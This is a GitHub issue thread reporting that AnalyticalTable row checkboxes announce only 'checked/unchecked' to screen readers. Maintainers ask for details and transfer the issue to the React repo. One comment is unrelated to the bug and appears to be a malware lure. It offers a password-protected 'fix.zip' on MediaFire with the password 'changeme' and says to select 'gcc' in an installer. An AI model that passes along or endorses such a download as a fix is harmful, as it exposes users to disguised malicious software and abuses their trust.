### ISSUE TITLE
AnalyticalTable

### ISSUE THREAD

**Issue by durgaprasad1995** [SAP/ui5-webcomponents#9743]
### Bug Description

Accessibility Issue.

When the user selects and deselects the checkbox it should read the row details. 

Currently, it's reading only checked and unchecked.

**Observed Behavior:**

There is no information conveyed to the end user upon selecting or deselecting the rows present within the 'Items(xxxx)' table which is present within the 'Supplier' dialog box.

 

**Expected Behavior:**

State of the should be read out to screen reader users.
Providing state of the UI on all user interface components enables compatibility with assistive technology, such as screen readers, screen magnifiers, and speech recognition software, used by people with disabilities.
Here information as 'Checked/selected' should be read out when sub menu items are accessed.

State (expand/collapse) of the UI should be read out to screen reader users.

### Expected Behaviour

State of the should be read out to screen reader users.
Providing state of the UI on all user interface components enables compatibility with assistive technology, such as screen readers, screen magnifiers, and speech recognition software, used by people with disabilities.
Here information as 'Checked/selected' should be read out when sub menu items are accessed.

State (expand/collapse) of the UI should be read out to screen reader users.

### Steps to Reproduce

1.
2.
3.
...

### Log Output, Stack Trace or Screenshots

![image](https://github.com/user-attachments/assets/5d23cf9a-f2a3-4ba0-a2c4-6968bb9ff9e1)

### Priority

Very High

### UI5 Web Components Version

1.17.0

### Browser

Chrome

### Operating System

Windows

### Organization

SAP

### Declaration

- [X] I’m not disclosing any internal or sensitive information.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by elenastoyanovaa** [comment]
Hello,

In order to process the reported issue we need a sample, were we can debug, reproduce and analyse the problem. Without that we would be enable to determine the root cause of the issue.
For accessibility related issue we need some further information, which is described here: https://sap.github.io/ui5-webcomponents/nightly/docs/advanced/accessibility/#testing-accessibility
As I saw that you identify the issue as a Very High Prio it will be important for us to  give us information/reference to the suspected violated accessibility requirement (e.g. Web Content Accessibility Guidelines WCAG 2.2, BITV 2.0, EN 301 549) and the accessibility impact. 

Kind Regards,
Elena

**Comment by elenastoyanovaa** [comment]
Hello @MarcusNotheis @Lukas742 ,

It seems that this table does not use a ui5 web components table. Can you please transfer the issue to your queue?

Kind Regards,
Elena

**Comment by Lukas742** [comment]
Thanks for reporting! I'll forward this issue to the UI5 Web Components for React repo as the affected component is developed there.
